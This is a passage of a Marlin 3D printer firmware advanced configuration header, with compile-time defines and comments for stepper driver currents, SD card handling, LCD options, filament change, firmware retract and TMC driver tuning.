HOME_AFTER_DEACTIVATE // Require rehoming after steppers are deactivated // @section lcd #if ENABLED(ULTIPANEL) #define MANUAL_FEEDRATE_XYZ 50*60 #define MANUAL_FEEDRATE { MANUAL_FEEDRATE_XYZ, MANUAL_FEEDRATE_XYZ, MANUAL_FEEDRATE_XYZ, 60 } // Feedrates for manual moves along X, Y, Z, E from panel #define ULTIPANEL_FEEDMULTIPLY // Comment to disable setting feedrate multiplier via encoder #endif // @section extras // minimum time in microseconds that a movement needs to take if the buffer is emptied. #define DEFAULT_MINSEGMENTTIME 20000 // If defined the movements slow down when the look ahead buffer is only half full // (don't use SLOWDOWN with DELTA because DELTA generates hundreds of segments per second) //#define SLOWDOWN // Frequency limit // See nophead's blog for more info // Not working O //#define XY_FREQUENCY_LIMIT 15 // Minimum planner junction speed. Sets the default minimum speed the planner plans for at the end // of the buffer and all stops. This should not be much greater than zero and should only be changed // if unwanted behavior is observed on a user's machine when running at very slow speeds. #define MINIMUM_PLANNER_SPEED 0.05 // (mm/sec) // // Use Junction Deviation instead of traditional Jerk Limiting // //#define JUNCTION_DEVIATION #if ENABLED(JUNCTION_DEVIATION) #define JUNCTION_DEVIATION_MM 0.02 // (mm) Distance from real junction edge #endif /** * Adaptive Step Smoothing increases the resolution of multi-axis moves, particularly at step frequencies * below 1kHz (for AVR) or 10kHz (for ARM), where aliasing between axes in multi-axis moves causes audible * vibration and surface artifacts. The algorithm adapts to provide the best possible step smoothing at the * lowest stepping frequencies. */ //#define ADAPTIVE_STEP_SMOOTHING // Microstep setting (Only functional when stepper driver microstep pins are connected to MCU. #define MICROSTEP_MODES { 16, 16, 16, 16, 16 } // [1,2,4,8,16] /** * @section stepper motor current * * Some boards have a means of setting the stepper motor current via firmware. * * The power on motor currents are set by: * PWM_MOTOR_CURRENT - used by MINIRAMBO & ULTIMAIN_2 * known compatible chips: A4982 * DIGIPOT_MOTOR_CURRENT - used by BQ_ZUM_MEGA_3D, RAMBO & SCOOVO_X9H * known compatible chips: AD5206 * DAC_MOTOR_CURRENT_DEFAULT - used by PRINTRBOARD_REVF & RIGIDBOARD_V2 * known compatible chips: MCP4728 * DIGIPOT_I2C_MOTOR_CURRENTS - used by 5DPRINT, AZTEEG_X3_PRO, MIGHTYBOARD_REVE * known compatible chips: MCP4451, MCP4018 * * Motor currents can also be set by M907 - M910 and by the LCD. * M907 - applies to all. * M908 - BQ_ZUM_MEGA_3D, RAMBO, PRINTRBOARD_REVF, RIGIDBOARD_V2 & SCOOVO_X9H * M909, M910 & LCD - only PRINTRBOARD_REVF & RIGIDBOARD_V2 */ //#define PWM_MOTOR_CURRENT { 1300, 1300, 1250 } // Values in milliamps //#define DIGIPOT_MOTOR_CURRENT { 135,135,135,135,135 } // Values 0-255 (RAMBO 135 = ~0.75A, 185 = ~1A) //#define DAC_MOTOR_CURRENT_DEFAULT { 70, 80, 90, 80 } // Default drive percent - X, Y, Z, E axis // Use an I2C based DIGIPOT (e.g., Azteeg X3 Pro) //#define DIGIPOT_I2C #if ENABLED(DIGIPOT_I2C) && !defined(DIGIPOT_I2C_ADDRESS_A) /** * Common slave addresses: * * A (A shifted) B (B shifted) IC * Smoothie 0x2C (0x58) 0x2D (0x5A) MCP4451 * AZTEEG_X3_PRO 0x2C (0x58) 0x2E (0x5C) MCP4451 * MIGHTYBOARD_REVE 0x2F (0x5E) MCP4018 */ #define DIGIPOT_I2C_ADDRESS_A 0x2C // unshifted slave address for first DIGIPOT #define DIGIPOT_I2C_ADDRESS_B 0x2D // unshifted slave address for second DIGIPOT #endif //#define DIGIPOT_MCP4018 // Requires library from https://github.com/stawel/SlowSoftI2CMaster #define DIGIPOT_I2C_NUM_CHANNELS 8 // 5DPRINT: 4 AZTEEG_X3_PRO: 8 // Actual motor currents in Amps. The number of entries must match DIGIPOT_I2C_NUM_CHANNELS. // These correspond to the physical drivers, so be mindful if the order is changed. #define DIGIPOT_I2C_MOTOR_CURRENTS { 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 } // AZTEEG_X3_PRO //=========================================================================== //=============================Additional Features=========================== //=========================================================================== #define ENCODER_RATE_MULTIPLIER // If defined, certain menu edit operations automatically multiply the steps when the encoder is moved quickly #define ENCODER_10X_STEPS_PER_SEC 75 // If the encoder steps per sec exceeds this value, multiply steps moved x10 to quickly advance the value #define ENCODER_100X_STEPS_PER_SEC 160 // If the encoder steps per sec exceeds this value, multiply steps moved x100 to really quickly advance the value //#define CHDK 4 //Pin for triggering CHDK to take a picture see how to use it here http://captain-slow.dk/2014/03/09/3d-printing-timelapses/ #define CHDK_DELAY 50 //How long in ms the pin should stay HIGH before going LOW again // @section lcd // Include a page of printer information in the LCD Main Menu //#define LCD_INFO_MENU // Scroll a longer status message into view //#define STATUS_MESSAGE_SCROLLING // On the Info Screen, display XY with one decimal place when possible //#define LCD_DECIMAL_SMALL_XY // The timeout (in ms) to return to the status screen from sub-menus //#define LCD_TIMEOUT_TO_STATUS 15000 // Add an 'M73' G-code to set the current percentage //#define LCD_SET_PROGRESS_MANUALLY #if ENABLED(SDSUPPORT) || ENABLED(LCD_SET_PROGRESS_MANUALLY) //#define LCD_PROGRESS_BAR // Show a progress bar on HD44780 LCDs for SD printing #if ENABLED(LCD_PROGRESS_BAR) #define PROGRESS_BAR_BAR_TIME 2000 // (ms) Amount of time to show the bar #define PROGRESS_BAR_MSG_TIME 3000 // (ms) Amount of time to show the status message #define PROGRESS_MSG_EXPIRE 0 // (ms) Amount of time to retain the status message (0=forever) //#define PROGRESS_MSG_ONCE // Show the message for MSG_TIME then clear it //#define LCD_PROGRESS_BAR_TEST // Add a menu item to test the progress bar #endif #endif // SDSUPPORT || LCD_SET_PROGRESS_MANUALLY /** * LED Control Menu * Enable this feature to add LED Control to the LCD menu */ //#define LED_CONTROL_MENU #if ENABLED(LED_CONTROL_MENU) #define LED_COLOR_PRESETS // Enable the Preset Color menu option #if ENABLED(LED_COLOR_PRESETS) #define LED_USER_PRESET_RED 255 // User defined RED value #define LED_USER_PRESET_GREEN 128 // User defined GREEN value #define LED_USER_PRESET_BLUE 0 // User defined BLUE value #define LED_USER_PRESET_WHITE 255 // User defined WHITE value #define LED_USER_PRESET_BRIGHTNESS 255 // User defined intensity //#define LED_USER_PRESET_STARTUP // Have the printer display the user preset color on startup #endif #endif // LED_CONTROL_MENU #if ENABLED(SDSUPPORT) // Some RAMPS and other boards don't detect when an SD card is inserted. You can work // around this by connecting a push button or single throw switch to the pin defined // as SD_DETECT_PIN in your board's pins definitions. // This setting should be disabled unless you are using a push button, pulling the pin to ground. // Note: This is always disabled for ULTIPANEL (except ELB_FULL_GRAPHIC_CONTROLLER). #define SD_DETECT_INVERTED #define SD_FINISHED_STEPPERRELEASE true // Disable steppers when SD Print is finished #define SD_FINISHED_RELEASECOMMAND "M84 X Y Z E" // You might want to keep the z enabled so your bed stays in place. // Reverse SD sort to show "more recent" files first, according to the card's FAT. // Since the FAT gets out of order with usage, SDCARD_SORT_ALPHA is recommended. #define SDCARD_RATHERRECENTFIRST // Add an option in the menu to run all auto#.g files //#define MENU_ADDAUTOSTART /** * Continue after Power-Loss (Creality3D) * * Store the current state to the SD Card at the start of each layer * during SD printing. If the recovery file is found at boot time, present * an option on the LCD screen to continue the print from the last-known * point in the file. */ //#define POWER_LOSS_RECOVERY #if ENABLED(POWER_LOSS_RECOVERY) //#define POWER_LOSS_PIN 44 // Pin to detect power loss //#define POWER_LOSS_STATE HIGH // State of pin indicating power loss #endif /** * Sort SD file listings in alphabetical order. * * With this option enabled, items on SD cards will be sorted * by name for easier navigation. * * By default... * * - Use the slowest -but safest- method for sorting. * - Folders are sorted to the top. * - The sort key is statically allocated. * - No added G-code (M34) support. * - 40 item sorting limit. (Items after the first 40 are unsorted.) * * SD sorting uses static allocation (as set by SDSORT_LIMIT), allowing the * compiler to calculate the worst-case usage and throw an error if the SRAM * limit is exceeded. * * - SDSORT_USES_RAM provides faster sorting via a static directory buffer. * - SDSORT_USES_STACK does the same, but uses a local stack-based buffer. * - SDSORT_CACHE_NAMES will retain the sorted file listing in RAM. (Expensive!) * - SDSORT_DYNAMIC_RAM only uses RAM when the SD menu is visible. (Use with caution!) */ //#define SDCARD_SORT_ALPHA // SD Card Sorting options #if ENABLED(SDCARD_SORT_ALPHA) #define SDSORT_LIMIT 40 // Maximum number of sorted items (10-256). Costs 27 bytes each. #define FOLDER_SORTING -1 // -1=above 0=none 1=below #define SDSORT_GCODE false // Allow turning sorting on/off with LCD and M34 g-code. #define SDSORT_USES_RAM false // Pre-allocate a static array for faster pre-sorting. #define SDSORT_USES_STACK false // Prefer the stack for pre-sorting to give back some SRAM. (Negated by next 2 options.) #define SDSORT_CACHE_NAMES false // Keep sorted items in RAM longer for speedy performance. Most expensive option. #define SDSORT_DYNAMIC_RAM false // Use dynamic allocation (within SD menus). Least expensive option. Set SDSORT_LIMIT before use! #define SDSORT_CACHE_VFATS 2 // Maximum number of 13-byte VFAT entries to use for sorting. // Note: Only affects SCROLL_LONG_FILENAMES with SDSORT_CACHE_NAMES but not SDSORT_DYNAMIC_RAM. #endif // This allows hosts to request long names for files and folders with M33 //#define LONG_FILENAME_HOST_SUPPORT // Enable this option to scroll long filenames in the SD card menu //#define SCROLL_LONG_FILENAMES /** * This option allows you to abort SD printing when any endstop is triggered. * This feature must be enabled with "M540 S1" or from the LCD menu. * To have any effect, endstops must be enabled during SD printing. */ //#define ABORT_ON_ENDSTOP_HIT_FEATURE_ENABLED /** * This option makes it easier to print the same SD Card file again. * On print completion the LCD Menu will open with the file selected. * You can just click to start the print, or navigate elsewhere. */ //#define SD_REPRINT_LAST_SELECTED_FILE /** * Auto-report SdCard status with M27 S<seconds> */ //#define AUTO_REPORT_SD_STATUS #endif // SDSUPPORT /** * Additional options for Graphical Displays * * Use the optimizations here to improve printing performance, * which can be adversely affected by graphical display drawing, * especially when doing several short moves, and when printing * on DELTA and SCARA machines. * * Some of these options may result in the display lagging behind * controller events, as there is a trade-off between reliable * printing performance versus fast display updates. */ #if ENABLED(DOGLCD) // Show SD percentage next to the progress bar //#define DOGM_SD_PERCENT // Enable to save many cycles by drawing a hollow frame on the Info Screen #define XYZ_HOLLOW_FRAME // Enable to save many cycles by drawing a hollow frame on Menu Screens #define MENU_HOLLOW_FRAME // A bigger font is available for edit items. Costs 3120 bytes of PROGMEM. // Western only. Not available for Cyrillic, Kana, Turkish, Greek, or Chinese. //#define USE_BIG_EDIT_FONT // A smaller font may be used on the Info Screen. Costs 2300 bytes of PROGMEM. // Western only. Not available for Cyrillic, Kana, Turkish, Greek, or Chinese. //#define USE_SMALL_INFOFONT // Enable this option and reduce the value to optimize screen updates. // The normal delay is 10µs. Use the lowest value that still gives a reliable display. //#define DOGM_SPI_DELAY_US 5 // Swap the CW/CCW indicators in the graphics overlay //#define OVERLAY_GFX_REVERSE #if ENABLED(U8GLIB_ST7920) /** * ST7920-based LCDs can emulate a 16 x 4 character display using * the ST7920 character-generator for very fast screen updates. * Enable LIGHTWEIGHT_UI to use this special display mode. * * Since LIGHTWEIGHT_UI has limited space, the position and status * message occupy the same line. Set STATUS_EXPIRE_SECONDS to the * length of time to display the status message before clearing. * * Set STATUS_EXPIRE_SECONDS to zero to never clear the status. * This will prevent position updates from being displayed. */ //#define LIGHTWEIGHT_UI #if ENABLED(LIGHTWEIGHT_UI) #define STATUS_EXPIRE_SECONDS 20 #endif #endif #endif // DOGLCD // @section safety // The hardware watchdog should reset the microcontroller disabling all outputs, // in case the firmware gets stuck and doesn't do temperature regulation. #define USE_WATCHDOG #if ENABLED(USE_WATCHDOG) // If you have a watchdog reboot in an ArduinoMega2560 then the device will hang forever, as a watchdog reset will leave the watchdog on. // The "WATCHDOG_RESET_MANUAL" goes around this by not using the hardware reset. // However, THIS FEATURE IS UNSAFE!, as it will only work if interrupts are disabled. And the code could hang in an interrupt routine with interrupts disabled. //#define WATCHDOG_RESET_MANUAL #endif // @section lcd /** * Babystepping enables movement of the axes by tiny increments without changing * the current position values. This feature is used primarily to adjust the Z * axis in the first layer of a print in real-time. * * Warning: Does not respect endstops! */ //#define BABYSTEPPING #if ENABLED(BABYSTEPPING) //#define BABYSTEP_XY // Also enable X/Y Babystepping. Not supported on DELTA! #define BABYSTEP_INVERT_Z false // Change if Z babysteps should go the other way #define BABYSTEP_MULTIPLICATOR 1 // Babysteps are very small. Increase for faster motion. //#define BABYSTEP_ZPROBE_OFFSET // Enable to combine M851 and Babystepping //#define DOUBLECLICK_FOR_Z_BABYSTEPPING // Double-click on the Status Screen for Z Babystepping. #define DOUBLECLICK_MAX_INTERVAL 1250 // Maximum interval between clicks, in milliseconds. // Note: Extra time may be added to mitigate controller latency. //#define BABYSTEP_ZPROBE_GFX_OVERLAY // Enable graphical overlay on Z-offset editor #endif // @section extruder /** * Linear Pressure Control v1.5 * * Assumption: advance [steps] = k * (delta velocity [steps/s]) * K=0 means advance disabled. * * NOTE: K values for LIN_ADVANCE 1.5 differ from earlier versions! * * Set K around 0.22 for 3mm PLA Direct Drive with ~6.5cm between the drive gear and heatbreak. * Larger K values will be needed for flexible filament and greater distances. * If this algorithm produces a higher speed offset than the extruder can handle (compared to E jerk) * print acceleration will be reduced during the affected moves to keep within the limit. * * See http://marlinfw.org/docs/features/lin_advance.html for full instructions. * Mention @Sebastianv650 on GitHub to alert the author of any issues. */ //#define LIN_ADVANCE #if ENABLED(LIN_ADVANCE) #define LIN_ADVANCE_K 0.22 // Unit: mm compression per 1mm/s extruder speed //#define LA_DEBUG // If enabled, this will generate debug information output over USB. #endif // @section leveling #if ENABLED(MESH_BED_LEVELING) || ENABLED(AUTO_BED_LEVELING_UBL) // Override the mesh area if the automatic (max) area is too large //#define MESH_MIN_X MESH_INSET //#define MESH_MIN_Y MESH_INSET //#define MESH_MAX_X X_BED_SIZE - (MESH_INSET) //#define MESH_MAX_Y Y_BED_SIZE - (MESH_INSET) #endif // @section extras // // G2/G3 Arc Support // #define ARC_SUPPORT // Disable this feature to save ~3226 bytes #if ENABLED(ARC_SUPPORT) #define MM_PER_ARC_SEGMENT 1 // Length of each arc segment #define N_ARC_CORRECTION 25 // Number of intertpolated segments between corrections //#define ARC_P_CIRCLES // Enable the 'P' parameter to specify complete circles //#define CNC_WORKSPACE_PLANES // Allow G2/G3 to operate in XY, ZX, or YZ planes #endif // Support for G5 with XYZE destination and IJPQ offsets. Requires ~2666 bytes. //#define BEZIER_CURVE_SUPPORT // G38.2 and G38.3 Probe Target // Set MULTIPLE_PROBING if you want G38 to double touch //#define G38_PROBE_TARGET #if ENABLED(G38_PROBE_TARGET) #define G38_MINIMUM_MOVE 0.0275 // minimum distance in mm that will produce a move (determined using the print statement in check_move) #endif // Moves (or segments) with fewer steps than this will be joined with the next move #define MIN_STEPS_PER_SEGMENT 6 /** * Minimum delay after setting the stepper DIR (in ns) * 0 : No delay (Expect at least 10µS since one Stepper ISR must transpire) * 20 : Minimum for TMC2xxx drivers * 200 : Minimum for A4988 drivers * 500 : Minimum for LV8729 drivers (guess, no info in datasheet) * 650 : Minimum for DRV8825 drivers * 1500 : Minimum for TB6600 drivers (guess, no info in datasheet) * 15000 : Minimum for TB6560 drivers (guess, no info in datasheet) * * Override the default value based on the driver type set in Configuration.h. */ //#define MINIMUM_STEPPER_DIR_DELAY 650 /** * Minimum stepper driver pulse width (in µs) * 0 : Smallest possible width the MCU can produce, compatible with TMC2xxx drivers * 1 : Minimum for A4988 stepper drivers * 1 : Minimum for LV8729 stepper drivers * 2 : Minimum for DRV8825 stepper drivers * 3 : Minimum for TB6600 stepper drivers * 30 : Minimum for TB6560 stepper drivers * * Override the default value based on the driver type set in Configuration.h. */ //#define MINIMUM_STEPPER_PULSE 2 /** * Maximum stepping rate (in Hz) the stepper driver allows * If undefined, defaults to 1MHz / (2 * MINIMUM_STEPPER_PULSE) * 500000 : Maximum for A4988 stepper driver * 400000 : Maximum for TMC2xxx stepper drivers * 250000 : Maximum for DRV8825 stepper driver * 150000 : Maximum for TB6600 stepper driver * 130000 : Maximum for LV8729 stepper driver * 15000 : Maximum for TB6560 stepper driver * * Override the default value based on the driver type set in Configuration.h. */ //#define MAXIMUM_STEPPER_RATE 250000 // @section temperature // Control heater 0 and heater 1 in parallel. //#define HEATERS_PARALLEL //=========================================================================== //================================= Buffers ================================= //=========================================================================== // @section hidden // The number of linear motions that can be in the plan at any give time. // THE BLOCK_BUFFER_SIZE NEEDS TO BE A POWER OF 2 (e.g. 8, 16, 32) because shifts and ors are used to do the ring-buffering. #if ENABLED(SDSUPPORT) #define BLOCK_BUFFER_SIZE 16 // SD,LCD,Buttons take more memory, block buffer needs to be smaller #else #define BLOCK_BUFFER_SIZE 16 // maximize block buffer #endif // @section serial // The ASCII buffer for serial input #define MAX_CMD_SIZE 96 #define BUFSIZE 4 // Transmission to Host Buffer Size // To save 386 bytes of PROGMEM (and TX_BUFFER_SIZE+3 bytes of RAM) set to 0. // To buffer a simple "ok" you need 4 bytes. // For ADVANCED_OK (M105) you need 32 bytes. // For debug-echo: 128 bytes for the optimal speed. // Other output doesn't need to be that speedy. // :[0, 2, 4, 8, 16, 32, 64, 128, 256] #define TX_BUFFER_SIZE 0 // Host Receive Buffer Size // Without XON/XOFF flow control (see SERIAL_XON_XOFF below) 32 bytes should be enough. // To use flow control, set this buffer size to at least 1024 bytes. // :[0, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048] //#define RX_BUFFER_SIZE 1024 #if RX_BUFFER_SIZE >= 1024 // Enable to have the controller send XON/XOFF control characters to // the host to signal the RX buffer is becoming full. //#define SERIAL_XON_XOFF #endif #if ENABLED(SDSUPPORT) // Enable this option to collect and display the maximum // RX queue usage after transferring a file to SD. //#define SERIAL_STATS_MAX_RX_QUEUED // Enable this option to collect and display the number // of dropped bytes after a file transfer to SD. //#define SERIAL_STATS_DROPPED_RX #endif // Enable an emergency-command parser to intercept certain commands as they // enter the serial receive buffer, so they cannot be blocked. // Currently handles M108, M112, M410 // Does not work on boards using AT90USB (USBCON) processors! //#define EMERGENCY_PARSER // Bad Serial-connections can miss a received command by sending an 'ok' // Therefore some clients abort after 30 seconds in a timeout. // Some other clients start sending commands while receiving a 'wait'. // This "wait" is only sent when the buffer is empty. 1 second is a good value here. //#define NO_TIMEOUTS 1000 // Milliseconds // Some clients will have this feature soon. This could make the NO_TIMEOUTS unnecessary. //#define ADVANCED_OK // @section extras /** * Firmware-based and LCD-controlled retract * * Add G10 / G11 commands for automatic firmware-based retract / recover. * Use M207 and M208 to define parameters for retract / recover. * * Use M209 to enable or disable auto-retract. * With auto-retract enabled, all G1 E moves within the set range * will be converted to firmware-based retract/recover moves. * * Be sure to turn off auto-retract during filament change. * * Note that M207 / M208 / M209 settings are saved to EEPROM. * */ //#define FWRETRACT // ONLY PARTIALLY TESTED #if ENABLED(FWRETRACT) #define MIN_AUTORETRACT 0.1 // When auto-retract is on, convert E moves of this length and over #define MAX_AUTORETRACT 10.0 // Upper limit for auto-retract conversion #define RETRACT_LENGTH 3 // Default retract length (positive mm) #define RETRACT_LENGTH_SWAP 13 // Default swap retract length (positive mm), for extruder change #define RETRACT_FEEDRATE 45 // Default feedrate for retracting (mm/s) #define RETRACT_ZLIFT 0 // Default retract Z-lift #define RETRACT_RECOVER_LENGTH 0 // Default additional recover length (mm, added to retract length when recovering) #define RETRACT_RECOVER_LENGTH_SWAP 0 // Default additional swap recover length (mm, added to retract length when recovering from extruder change) #define RETRACT_RECOVER_FEEDRATE 8 // Default feedrate for recovering from retraction (mm/s) #define RETRACT_RECOVER_FEEDRATE_SWAP 8 // Default feedrate for recovering from swap retraction (mm/s) #endif /** * Extra Fan Speed * Adds a secondary fan speed for each print-cooling fan. * 'M106 P<fan> T3-255' : Set a secondary speed for <fan> * 'M106 P<fan> T2' : Use the set secondary speed * 'M106 P<fan> T1' : Restore the previous fan speed */ //#define EXTRA_FAN_SPEED /** * Advanced Pause * Experimental feature for filament change support and for parking the nozzle when paused. * Adds the GCode M600 for initiating filament change. * If PARK_HEAD_ON_PAUSE enabled, adds the GCode M125 to pause printing and park the nozzle. * * Requires an LCD display. * Requires NOZZLE_PARK_FEATURE. * This feature is required for the default FILAMENT_RUNOUT_SCRIPT. */ //#define ADVANCED_PAUSE_FEATURE #if ENABLED(ADVANCED_PAUSE_FEATURE) #define PAUSE_PARK_RETRACT_FEEDRATE 60 // (mm/s) Initial retract feedrate. #define PAUSE_PARK_RETRACT_LENGTH 2 // (mm) Initial retract. // This short retract is done immediately, before parking the nozzle. #define FILAMENT_CHANGE_UNLOAD_FEEDRATE 10 // (mm/s) Unload filament feedrate. This can be pretty fast. #define FILAMENT_CHANGE_UNLOAD_ACCEL 25 // (mm/s^2) Lower acceleration may allow a faster feedrate. #define FILAMENT_CHANGE_UNLOAD_LENGTH 100 // (mm) The length of filament for a complete unload. // For Bowden, the full length of the tube and nozzle. // For direct drive, the full length of the nozzle. // Set to 0 for manual unloading. #define FILAMENT_CHANGE_SLOW_LOAD_FEEDRATE 6 // (mm/s) Slow move when starting load. #define FILAMENT_CHANGE_SLOW_LOAD_LENGTH 0 // (mm) Slow length, to allow time to insert material. // 0 to disable start loading and skip to fast load only #define FILAMENT_CHANGE_FAST_LOAD_FEEDRATE 6 // (mm/s) Load filament feedrate. This can be pretty fast. #define FILAMENT_CHANGE_FAST_LOAD_ACCEL 25 // (mm/s^2) Lower acceleration may allow a faster feedrate. #define FILAMENT_CHANGE_FAST_LOAD_LENGTH 0 // (mm) Load length of filament, from extruder gear to nozzle. // For Bowden, the full length of the tube and nozzle. // For direct drive, the full length of the nozzle. //#define ADVANCED_PAUSE_CONTINUOUS_PURGE // Purge continuously up to the purge length until interrupted. #define ADVANCED_PAUSE_PURGE_FEEDRATE 3 // (mm/s) Extrude feedrate (after loading). Should be slower than load feedrate. #define ADVANCED_PAUSE_PURGE_LENGTH 50 // (mm) Length to extrude after loading. // Set to 0 for manual extrusion. // Filament can be extruded repeatedly from the Filament Change menu // until extrusion is consistent, and to purge old filament. // Filament Unload does a Retract, Delay, and Purge first: #define FILAMENT_UNLOAD_RETRACT_LENGTH 13 // (mm) Unload initial retract length. #define FILAMENT_UNLOAD_DELAY 5000 // (ms) Delay for the filament to cool after retract. #define FILAMENT_UNLOAD_PURGE_LENGTH 8 // (mm) An unretract is done, then this length is purged. #define PAUSE_PARK_NOZZLE_TIMEOUT 45 // (seconds) Time limit before the nozzle is turned off for safety. #define FILAMENT_CHANGE_ALERT_BEEPS 10 // Number of alert beeps to play when a response is needed. #define PAUSE_PARK_NO_STEPPER_TIMEOUT // Enable for XYZ steppers to stay powered on during filament change. //#define PARK_HEAD_ON_PAUSE // Park the nozzle during pause and filament change. //#define HOME_BEFORE_FILAMENT_CHANGE // Ensure homing has been completed prior to parking for filament change //#define FILAMENT_LOAD_UNLOAD_GCODES // Add M701/M702 Load/Unload G-codes, plus Load/Unload in the LCD Prepare menu. //#define FILAMENT_UNLOAD_ALL_EXTRUDERS // Allow M702 to unload all extruders above a minimum target temp (as set by M302) #endif // @section tmc /** * TMC26X Stepper Driver options * * The TMC26XStepper library is required for this stepper driver. * https://github.com/trinamic/TMC26XStepper */ #if HAS_DRIVER(TMC26X) #define X_MAX_CURRENT 1000 // in mA #define X_SENSE_RESISTOR 91 // in mOhms #define X_MICROSTEPS 16 // number of microsteps #define X2_MAX_CURRENT 1000 #define X2_SENSE_RESISTOR 91 #define X2_MICROSTEPS 16 #define Y_MAX_CURRENT 1000 #define Y_SENSE_RESISTOR 91 #define Y_MICROSTEPS 16 #define Y2_MAX_CURRENT 1000 #define Y2_SENSE_RESISTOR 91 #define Y2_MICROSTEPS 16 #define Z_MAX_CURRENT 1000 #define Z_SENSE_RESISTOR 91 #define Z_MICROSTEPS 16 #define Z2_MAX_CURRENT 1000 #define Z2_SENSE_RESISTOR 91 #define Z2_MICROSTEPS 16 #define E0_MAX_CURRENT 1000 #define E0_SENSE_RESISTOR 91 #define E0_MICROSTEPS 16 #define E1_MAX_CURRENT 1000 #define E1_SENSE_RESISTOR 91 #define E1_MICROSTEPS 16 #define E2_MAX_CURRENT 1000 #define E2_SENSE_RESISTOR 91 #define E2_MICROSTEPS 16 #define E3_MAX_CURRENT 1000 #define E3_SENSE_RESISTOR 91 #define E3_MICROSTEPS 16 #define E4_MAX_CURRENT 1000 #define E4_SENSE_RESISTOR 91 #define E4_MICROSTEPS 16 #endif // @section tmc_smart /** * To use TMC2130 stepper drivers in SPI mode connect your SPI pins to * the hardware SPI interface on your board and define the required CS pins * in your `pins_MYBOARD.h` file. (e.g., RAMPS 1.4 uses AUX3 pins `X_CS_PIN 53`, `Y_CS_PIN 49`, etc.). * You may also use software SPI if you wish to use general purpose IO pins. * * You'll also need the TMC2130Stepper Arduino library * (https://github.com/teemuatlut/TMC2130Stepper). * * To use TMC2208 stepper UART-configurable stepper drivers * connect #_SERIAL_TX_PIN to the driver side PDN_UART pin with a 1K resistor. * To use the reading capabilities, also connect #_SERIAL_RX_PIN * to PDN_UART without a resistor. * The drivers can also be used with hardware serial. * * You'll also need the TMC2208Stepper Arduino library * (https://github.com/teemuatlut/TMC2208Stepper). */ #if HAS_TRINAMIC #define R_SENSE 0.11 // R_sense resistor for SilentStepStick2130 #define HOLD_MULTIPLIER 0.5 // Scales down the holding current from run current #define INTERPOLATE true // Interpolate X/Y/Z_MICROSTEPS to 256 #define X_CURRENT 800 // rms current in mA. Multiply by 1.41 for peak current. #define X_MICROSTEPS 16 // 0..256 #define Y_CURRENT 800 #define Y_MICROSTEPS 16 #define Z_CURRENT 800 #define Z_MICROSTEPS 16 #define X2_CURRENT 800 #define X2_MICROSTEPS 16 #define Y2_CURRENT 800 #define Y2_MICROSTEPS 16 #define Z2_CURRENT 800 #define Z2_MICROSTEPS 16 #define E0_CURRENT 800 #define E0_MICROSTEPS 16 #define E1_CURRENT 800 #define E1_MICROSTEPS 16 #define E2_CURRENT 800 #define E2_MICROSTEPS 16 #define E3_CURRENT 800 #define E3_MICROSTEPS 16 #define E4_CURRENT 800 #define E4_MICROSTEPS 16 /** * Use software SPI for TMC2130. * The default SW SPI pins are defined the respective pins files, * but you can override or define them here. */ //#define TMC_USE_SW_SPI //#define TMC_SW_MOSI -1 //#define TMC_SW_MISO -1 //#define TMC_SW_SCK -1 /** * Use Trinamic's ultra quiet stepping mode. * When disabled, Marlin will use spreadCycle stepping mode. */ #define STEALTHCHOP /** * Monitor Trinamic TMC2130 and TMC2208 drivers for error conditions, * like overtemperature and short to ground. TMC2208 requires hardware serial. * In the case of overtemperature Marlin can decrease the driver current until error condition clears. * Other detected conditions can be used to stop the current print. * Relevant g-codes: * M906 - Set or get motor current in milliamps using axis codes X, Y, Z, E. Report values if no axis codes given. * M911 - Report stepper driver overtemperature pre-warn condition. * M912 - Clear stepper driver overtemperature pre-warn condition flag. * M122 S0/1 - Report driver parameters (Requires TMC_DEBUG) */ //#define MONITOR_DRIVER_STATUS #if ENABLED(MONITOR_DRIVER_STATUS) #define CURRENT_STEP_DOWN 50 // [mA] #define REPORT_CURRENT_CHANGE #define STOP_ON_ERROR #endif /** * The driver will switch to spreadCycle when stepper speed is over HYBRID_THRESHOLD. * This mode allows for faster movements at the expense of higher noise levels. * STEALTHCHOP needs to be enabled. * M913 X/Y/Z/E to live tune the setting */ //#define HYBRID_THRESHOLD #define X_HYBRID_THRESHOLD 100 // [mm/s] #define X2_HYBRID_THRESHOLD 100 #define Y_HYBRID_THRESHOLD 100 #define Y2_HYBRID_THRESHOLD 100 #define Z_HYBRID_THRESHOLD 3 #define Z2_HYBRID_THRESHOLD 3 #define E0_HYBRID_THRESHOLD 30 #define E1_HYBRID_THRESHOLD 30 #define E2_HYBRID_THRESHOLD 30 #define E3_HYBRID_THRESHOLD 30 #define E4_HYBRID_THRESHOLD 30 /** * Use stallGuard2 to sense an obstacle and trigger an endstop. * You need to place a wire from the driver's DIAG1 pin to the X/Y endstop pin. * X, Y, and Z homing will always be done in spreadCycle mode. * * X/Y/Z_HOMING_SENSITIVITY is used for tuning the trigger sensitivity. * Higher values make the system LESS sensitive. * Lower value make the system MORE sensitive. * Too low values can lead to false positives, while too high values will collide the axis without triggering. * It is advised to set X/Y/Z_HOME_BUMP_MM to 0. * M914 X/Y/Z to live tune the setting */ //#define SENSORLESS_HOMING // TMC2130 only #if ENABLED(SENSORLESS_HOMING) #define X_HOMING_SENSITIVITY 8 #define Y_HOMING_SENSITIVITY 8 #define Z_HOMING_SENSITIVITY 8 #endif /** * Enable M122 debugging command for TMC stepper drivers. * M122 S0/1 will enable continous reporting. */ //#define TMC_DEBUG /** * M915 Z Axis Calibration * * - Adjust Z stepper current, * - Drive the Z axis to its physical maximum, and * - Home Z to account for the lost steps. * * Use M915 Snn to specify the current. * Use M925 Znn to add extra Z height to Z_MAX_POS. */ //#define TMC_Z_CALIBRATION #if ENABLED(TMC_Z_CALIBRATION) #define CALIBRATION_CURRENT 250 #define CALIBRATION_EXTRA_HEIGHT 10 #endif /** * You can set your own advanced settings by filling in predefined functions. * A list of available functions can be found on the library github page * https://github.com/teemuatlut/TMC2130Stepper * https://github.com/teemuatlut/TMC2208Stepper * * Example: * #define TMC_ADV() { \ * stepperX.diag0_temp_prewarn(1); \ * stepperY.interpolate(0); \ * } */ #define TMC_ADV() { } #endif // TMC2130 || TMC2208 // @section L6470 /** * L6470 Stepper Driver options * * The Arduino-L6470 library is required for this stepper driver. * https://github.com/ameyer/Arduino-L6470 */ #if HAS_DRIVER(L6470) #define X_MICROSTEPS 16 // number of microsteps #define X_OVERCURRENT 2000 // maxc current in mA. If the current goes over this value, the driver will switch off #define X_STALLCURRENT 1500 // current in mA where the driver will detect a stall 